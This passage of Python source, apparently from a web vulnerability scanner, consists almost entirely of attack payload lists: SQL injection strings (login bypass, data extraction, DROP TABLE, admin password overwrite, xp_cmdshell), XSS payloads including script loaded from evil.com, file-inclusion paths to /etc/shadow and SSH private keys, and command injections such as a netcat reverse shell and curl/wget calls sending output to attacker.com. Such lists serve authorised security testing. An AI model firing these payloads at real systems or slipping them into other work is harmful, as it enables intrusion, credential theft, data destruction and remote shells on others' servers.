    "pentest",
    "nessus",
    "qualys",
    "burp",
    "cert",
    "certs",
    "pki",
    "ca",
    "acme",
    "letsencrypt",
    # --- Miscellaneous ---
    "old",
    "new",
    "legacy",
    "v1",
    "v2",
    "v3",
    "temp",
    "tmp",
    "scratch",
    "origin",
    "upstream",
    "backend",
    "geo",
    "geoip",
    "maps",
    "map",
    "search",
    "solr",
    "lucene",
    "report",
    "reports",
    "bi",
    "cron",
    "scheduler",
    "jobs",
    "worker",
    "workers",
    "node",
    "node1",
    "node2",
    "node3",
    "cluster",
    "cluster1",
    "master",
    "slave",
    "primary",
    "replica",
    "standby",
    "dr",
    "disaster-recovery",
    "failover",
    "aws",
    "azure",
    "gcp",
    "cloud",
    "cdn",
    "akamai",
    "cloudflare",
    "cf",
]

# ---------------------------------------------------------------------------
# SQLI_PAYLOADS  (100+ entries)
# ---------------------------------------------------------------------------
SQLI_PAYLOADS: list[str] = [
    # --- Basic authentication bypass ---
    "' OR '1'='1",
    "' OR '1'='1'--",
    "' OR '1'='1'#",
    "' OR '1'='1'/*",
    "' OR 1=1--",
    "' OR 1=1#",
    '" OR "1"="1"--',
    '" OR 1=1--',
    "admin'--",
    "admin' #",
    "admin'/*",
    "') OR ('1'='1",
    "') OR ('1'='1'--",
    "')) OR (('1'='1",
    "' OR ''='",
    "' OR 'x'='x",
    "1' OR '1'='1",
    "' OR 1=1 LIMIT 1--",
    "' OR 1=1 LIMIT 1#",
    "' OR 'a'='a",
    # --- UNION-based ---
    "' UNION SELECT NULL--",
    "' UNION SELECT NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL--",
    "0 UNION SELECT 1,2,3,CONCAT(0x7e,version(),0x7e),5--",
    "0 UNION ALL SELECT NULL,CONCAT(0x7e,user(),0x7e),NULL--",
    "' UNION SELECT username,password FROM users--",
    "' UNION SELECT table_name,NULL FROM information_schema.tables--",
    "' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--",
    "1 UNION SELECT ALL FROM information_schema.tables WHERE table_schema=database()--",
    # --- Error-based (MySQL) ---
    "' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--",
    "' AND UPDATEXML(1,CONCAT(0x7e,VERSION()),1)--",
    "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    "' AND EXP(~(SELECT * FROM (SELECT version())a))--",
    "' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7e,version(),0x7e)) USING utf8)))--",
    # --- Error-based (MSSQL) ---
    "1 AND 1=CONVERT(int,(SELECT @@version))--",
    "1 AND 1=CONVERT(int,(SELECT DB_NAME()))--",
    "1 AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--",
    "'; EXEC xp_cmdshell('whoami')--",
    # --- Error-based (PostgreSQL) ---
    "' AND 1=CAST((SELECT version()) AS int)--",
    "' AND 1=CAST((SELECT current_user) AS int)--",
    "',CAST((SELECT version()) AS int))--",
    # --- Error-based (Oracle) ---
    "' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT banner FROM v$version WHERE ROWNUM=1))--",
    "' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE ROWNUM=1))--",
    # --- Boolean blind ---
    "' AND 1=1--",
    "' AND 1=2--",
    "' AND (SELECT SUBSTRING(version(),1,1))='5'--",
    "' AND (SELECT LENGTH(database()))>0--",
    "' AND (SELECT ASCII(SUBSTRING(database(),1,1)))>64--",
    "' AND (SELECT COUNT(*) FROM information_schema.tables)>0--",
    "1 AND 1=1",
    "1 AND 1=2",
    "1 OR 1=1",
    "1 OR 1=2",
    "1' AND '1'='1",
    "1' AND '1'='2",
    # --- Time-based blind ---
    "' AND SLEEP(5)--",
    "' AND SLEEP(5)#",
    "' OR SLEEP(5)--",
    "'; WAITFOR DELAY '0:0:5'--",
    "'; WAITFOR DELAY '0:0:5'#",
    "' AND BENCHMARK(5000000,MD5('test'))--",
    "1; WAITFOR DELAY '0:0:5'--",
    "' AND (SELECT * FROM (SELECT SLEEP(5))a)--",
    "' AND IF(1=1,SLEEP(5),0)--",
    "' AND IF(1=2,SLEEP(5),0)--",
    "' OR IF(1=1,SLEEP(5),0)--",
    "1 AND pg_sleep(5)--",
    "1; SELECT pg_sleep(5)--",
    "' || pg_sleep(5)--",
    "'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--",
    # --- Stacked queries ---
    "'; DROP TABLE test;--",
    "'; INSERT INTO users VALUES('hacker','hacked')--",
    "'; UPDATE users SET password='hacked' WHERE username='admin'--",
    "'; CREATE TABLE test(id int)--",
    # --- WAF bypass / encoding ---
    "'%20OR%20'1'%3D'1",
    "'%20OR%201%3D1--",
    "'/**/OR/**/1=1--",
    "'/*!50000OR*/1=1--",
    "' /*!UNION*/ /*!SELECT*/ 1,2,3--",
    "' uNiOn SeLeCt 1,2,3--",
    "' UnIoN%20sElEcT 1,2,3--",
    "' UNION/**/SELECT/**/1,2,3--",
    "' uni%6fn sel%65ct 1,2,3--",
    "%27%20OR%20%271%27%3D%271",
    "' OR 1=1-- -",
    "' OR 1=1;%00",
    "0x27204f522027312c273d2731",
    # --- SQLite ---
    "' UNION SELECT sql FROM sqlite_master--",
    "' UNION SELECT name FROM sqlite_master WHERE type='table'--",
    # --- Second-order / misc ---
    "'; EXEC master..xp_dirtree '\\\\attacker.com\\share'--",
    "' AND LOAD_FILE('/etc/passwd')--",
    "' INTO OUTFILE '/tmp/test.txt'--",
    "' PROCEDURE ANALYSE()--",
    "1 ORDER BY 1--",
    "1 ORDER BY 2--",
    "1 ORDER BY 3--",
    "1 ORDER BY 10--",
    "1 ORDER BY 100--",
]

# ---------------------------------------------------------------------------
# XSS_PAYLOADS  (100+ entries)
# ---------------------------------------------------------------------------
XSS_PAYLOADS: list[str] = [
    # --- Basic reflected ---
    "<script>alert(1)</script>",
    "<script>alert('XSS')</script>",
    "<script>alert(document.cookie)</script>",
    "<script>alert(document.domain)</script>",
    "<script>prompt(1)</script>",
    "<script>confirm(1)</script>",
    "<script src=//evil.com/xss.js></script>",
    # --- Image / media handlers ---
    "<img src=x onerror=alert(1)>",
    "<img src=x onerror=alert('XSS')>",
    "<img/src=x onerror=alert(1)>",
    "<img src=x onerror='alert(1)'>",
    "<video src=x onerror=alert(1)>",
    "<audio src=x onerror=alert(1)>",
    "<source src=x onerror=alert(1)>",
    "<input src=x onerror=alert(1)>",
    "<object data=javascript:alert(1)>",
    "<embed src=javascript:alert(1)>",
    # --- SVG ---
    "<svg onload=alert(1)>",
    "<svg/onload=alert(1)>",
    "<svg onload=alert('XSS')>",
    "<svg><script>alert(1)</script></svg>",
    "<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
    "<svg><set onbegin=alert(1) attributename=x>",
    "<svg><a><rect width=100% height=100%/><animate attributeName=href to=javascript:alert(1)>",
    # --- Event handlers ---
    "<body onload=alert(1)>",
    "<body onpageshow=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<marquee onstart=alert(1)>",
    "<input onfocus=alert(1) autofocus>",
    "<input onblur=alert(1) autofocus><input autofocus>",
    "<select onfocus=alert(1) autofocus>",
    "<textarea onfocus=alert(1) autofocus>",
    "<keygen onfocus=alert(1) autofocus>",
    "<meter onmouseover=alert(1)>0</meter>",
    "<marquee behavior=alternate onstart=alert(1)>xss</marquee>",
    "<isindex type=image src=x onerror=alert(1)>",
    "<form><button formaction=javascript:alert(1)>click",
    "<math><maction actiontype=toggle><mi>click</mi><mi onclick=alert(1)>me</mi></maction></math>",
    # --- Attribute injection ---
    '"><script>alert(1)</script>',
    '"><img src=x onerror=alert(1)>',
    "'><script>alert(1)</script>",
    "' onfocus=alert(1) autofocus='",
    '" onfocus=alert(1) autofocus="',
    '" onmouseover="alert(1)',
    '" autofocus onfocus="alert(1)',
    '" onmouseover=alert(1) t="',
    # --- DOM-based ---
    "javascript:alert(1)",
    "javascript:alert(document.cookie)",
    "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
    "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert(1) )//",
    "#<script>alert(1)</script>",
    "data:text/html,<script>alert(1)</script>",
    "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
    # --- Template injection ---
    "{{7*7}}",
    "{{constructor.constructor('return this')()}}",
    "${7*7}",
    "${alert(1)}",
    "<%= 7*7 %>",
    "#{7*7}",
    "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
    # --- Encoding tricks ---
    "<scr<script>ipt>alert(1)</scr</script>ipt>",
    "<SCRIPT>alert(1)</SCRIPT>",
    "<ScRiPt>alert(1)</ScRiPt>",
    "%3Cscript%3Ealert(1)%3C/script%3E",
    "&lt;script&gt;alert(1)&lt;/script&gt;",
    "\\x3cscript\\x3ealert(1)\\x3c/script\\x3e",
    "\\u003cscript\\u003ealert(1)\\u003c/script\\u003e",
    "<script>alert(String.fromCharCode(88,83,83))</script>",
    "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
    "<img src=x onerror=eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29')>",
    # --- CSP bypass ---
    "<script src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.min.js'></script><div ng-app>{{constructor.constructor('alert(1)')()}}</div>",
    "<base href='//evil.com/'>",
    "<script nonce=''>alert(1)</script>",
    "<meta http-equiv='refresh' content='0;url=javascript:alert(1)'>",
    # --- Polyglot ---
    "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%%0telerik|telerik|telerik|telerik|telerik|//",
    "'\"><img src=x onerror=alert(1)//",
    "';alert(1)//",
    '";alert(1)//',
    "'-alert(1)-'",
    "'-alert(1)//",
    # --- WAF bypass ---
    "<svg/onload=alert(1)>",
    "<svg onload=alert&#40;1&#41;>",
    "<svg onload=alert&#x28;1&#x29;>",
    "<svg onload=alert%281%29>",
    "<img src=x onerror=a]lert(1)>".replace("]", ""),
    "<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>",
    "<svg onload=&#x61;&#x6C;&#x65;&#x72;&#x74;(1)>",
    # --- Mutation XSS ---
    '<noscript><p title="</noscript><img src=x onerror=alert(1)>">',
    "<listing><img src=1 onerror=alert(1)>//",
    "<table><td background=javascript:alert(1)>",
    # --- Iframe ---
    "<iframe src='javascript:alert(1)'>",
    "<iframe src='data:text/html,<script>alert(1)</script>'>",
    "<iframe srcdoc='<script>alert(1)</script>'>",
    "<iframe onload=alert(1)>",
    # --- Additional WAF bypass & edge cases ---
    "<x onclick=alert(1)>click",
    "<div style=width:expression(alert(1))>",
    "<style>@import'javascript:alert(1)'</style>",
    "<link rel=stylesheet href=javascript:alert(1)>",
    '<xss style="x:expression(alert(1))">',
    "<input type=image src=x onerror=alert(1)>",
    "<form action=javascript:alert(1)><input type=submit>",
    "<isindex action=javascript:alert(1) type=image>",
]

# ---------------------------------------------------------------------------
# LFI_PAYLOADS  (80+ entries)
# ---------------------------------------------------------------------------
LFI_PAYLOADS: list[str] = [
    # --- Basic path traversal (Linux) ---
    "../../../etc/passwd",
    "../../../../etc/passwd",
    "../../../../../etc/passwd",
    "../../../../../../etc/passwd",
    "../../../../../../../etc/passwd",
    "../../../etc/shadow",
    "../../../etc/hosts",
    "../../../etc/hostname",
    "../../../etc/issue",
    "../../../etc/motd",
    "../../../etc/os-release",
    "../../../etc/group",
    "../../../etc/resolv.conf",
    "../../../etc/crontab",
    "../../../etc/ssh/sshd_config",
    "../../../etc/nginx/nginx.conf",
    "../../../etc/apache2/apache2.conf",
    "../../../etc/httpd/conf/httpd.conf",
    "../../../etc/mysql/my.cnf",
    "../../../etc/postgresql/pg_hba.conf",
    "../../../proc/self/environ",
    "../../../proc/self/cmdline",
    "../../../proc/self/status",
    "../../../proc/self/fd/0",
    "../../../proc/version",
    "../../../proc/net/tcp",
    "../../../proc/net/udp",
    "../../../proc/sched_debug",
    # --- Basic path traversal (Windows) ---
    "..\\..\\..\\windows\\win.ini",
    "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
    "..\\..\\..\\windows\\system32\\config\\sam",
    "..\\..\\..\\windows\\system32\\config\\system",
    "..\\..\\..\\boot.ini",
    "..\\..\\..\\inetpub\\wwwroot\\web.config",
    "..\\..\\..\\inetpub\\logs\\logfiles",
    "..\\..\\..\\windows\\debug\\netsetup.log",
    "..\\..\\..\\windows\\system32\\inetsrv\\config\\applicationHost.config",
    # --- Encoding variations ---
    "..%2f..%2f..%2fetc%2fpasswd",
    "..%2f..%2f..%2f..%2fetc%2fpasswd",
    "..%252f..%252f..%252fetc%252fpasswd",
    "%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "..%c0%af..%c0%af..%c0%afetc/passwd",
    "..%ef%bc%8f..%ef%bc%8fetc/passwd",
    "..%e0%80%af..%e0%80%afetc/passwd",
    "....//....//....//etc/passwd",
    "....\\\\....\\\\....\\\\etc/passwd",
    "..././..././..././etc/passwd",
    "..;/..;/..;/etc/passwd",
    # --- Null byte (PHP < 5.3) ---
    "../../../etc/passwd%00",
    "../../../etc/passwd%00.php",
    "../../../etc/passwd%00.html",
    "../../../etc/passwd%00.jpg",
    "../../../etc/passwd\x00",
    "../../../../etc/passwd%00",
    "../../../../etc/passwd%00.php",
    # --- PHP wrappers ---
    "php://filter/convert.base64-encode/resource=/etc/passwd",
    "php://filter/convert.base64-encode/resource=index.php",
    "php://filter/convert.base64-encode/resource=config.php",
    "php://filter/convert.base64-encode/resource=../config.php",
    "php://filter/read=string.rot13/resource=/etc/passwd",
    "php://filter/read=string.toupper/resource=/etc/passwd",
    "php://filter/convert.iconv.utf-8.utf-16/resource=/etc/passwd",
    "php://filter/convert.iconv.utf-8.utf-7/resource=/etc/passwd",
    "php://input",
    "php://stdin",
    "php://memory",
    "php://temp",
    "data://text/plain,<?php phpinfo(); ?>",
    "data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==",
    "expect://id",
    "expect://whoami",
    "phar://test.phar/test.txt",
    "zip://test.zip#test.txt",
    # --- Log poisoning paths ---
    "/var/log/apache2/access.log",
    "/var/log/apache2/error.log",
    "/var/log/httpd/access_log",
    "/var/log/httpd/error_log",
    "/var/log/nginx/access.log",
    "/var/log/nginx/error.log",
    "/var/log/auth.log",
    "/var/log/syslog",
    "/var/log/mail.log",
    "/var/log/vsftpd.log",
    "/var/log/sshd.log",
    "/var/log/cron",
    "/var/log/lastlog",
    "/var/log/wtmp",
    "/var/log/btmp",
    "/var/log/faillog",
    # --- Special files ---
    "/etc/passwd",
    "/etc/shadow",
    "/etc/hosts",
    "/etc/issue",
    "/root/.bash_history",
    "/root/.ssh/id_rsa",
    "/root/.ssh/authorized_keys",
    "/home/*/.bash_history",
    "/home/*/.ssh/id_rsa",
    "file:///etc/passwd",
    "file:///c:/windows/win.ini",
]

# ---------------------------------------------------------------------------
# COMMAND_PAYLOADS  (60+ entries)
# ---------------------------------------------------------------------------
COMMAND_PAYLOADS: list[str] = [
    # --- Linux command injection (semicolon) ---
    "; id",
    "; whoami",
    "; uname -a",
    "; cat /etc/passwd",
    "; cat /etc/shadow",
    "; ls -la",
    "; ls -la /",
    "; pwd",
    "; ifconfig",
    "; ip addr",
    "; netstat -an",
    "; ps aux",
    "; env",
    "; set",
    "; df -h",
    # --- Pipe ---
    "| id",
    "| whoami",
    "| cat /etc/passwd",
    "| ls -la",
    "| uname -a",
    "| curl http://attacker.com/callback",
    "| wget http://attacker.com/callback",
    "| nc -e /bin/sh attacker.com 4444",
    # --- Logical OR ---
    "|| id",
    "|| whoami",
    "|| cat /etc/passwd",
    "|| uname -a",
    # --- Logical AND ---
    "&& id",
    "&& whoami",
    "&& cat /etc/passwd",
    "&& uname -a",
    # --- Backticks ---
    "`id`",
    "`whoami`",
    "`cat /etc/passwd`",
    "`uname -a`",
    # --- $() substitution ---
    "$(id)",
    "$(whoami)",
    "$(cat /etc/passwd)",
    "$(uname -a)",
    "$(curl http://attacker.com/$(whoami))",
    # --- Newline ---
    "%0aid",
    "%0awhoami",
    "%0acat /etc/passwd",
    "\\nid",
    "\\nwhoami",
    # --- Windows ---
    "& whoami",
    "& ipconfig",
    "& net user",
    "& dir",
    "& type C:\\windows\\win.ini",
    "& type C:\\windows\\system32\\drivers\\etc\\hosts",
    "& tasklist",
    "& systeminfo",
    "& net localgroup administrators",
    "| whoami",
    "|| whoami",
    "&& whoami",
    # --- Encoding / bypass ---
    ";+id",
    ";${IFS}id",
    ";$IFS$9id",
    ";{id}",
    ";\tid",
    ";%09id",
    "$(printf '\\x69\\x64')",
    "$(printf '\\151\\144')",
    "a]|id".replace("]", ""),
    # --- Time-based (blind) ---
    "; sleep 5",
    "| sleep 5",
    "& sleep 5",
    "&& sleep 5",
    "|| sleep 5",
    "$(sleep 5)",
    "`sleep 5`",
    "; ping -c 5 127.0.0.1",
    "| ping -c 5 127.0.0.1",
    "& ping -n 5 127.0.0.1",
    # --- Out-of-band ---
    "; nslookup attacker.com",
    "| nslookup attacker.com",
    "$(nslookup attacker.com)",
    "; curl http://attacker.com/?d=$(whoami)",
    "| wget http://attacker.com/?d=$(id)",
]
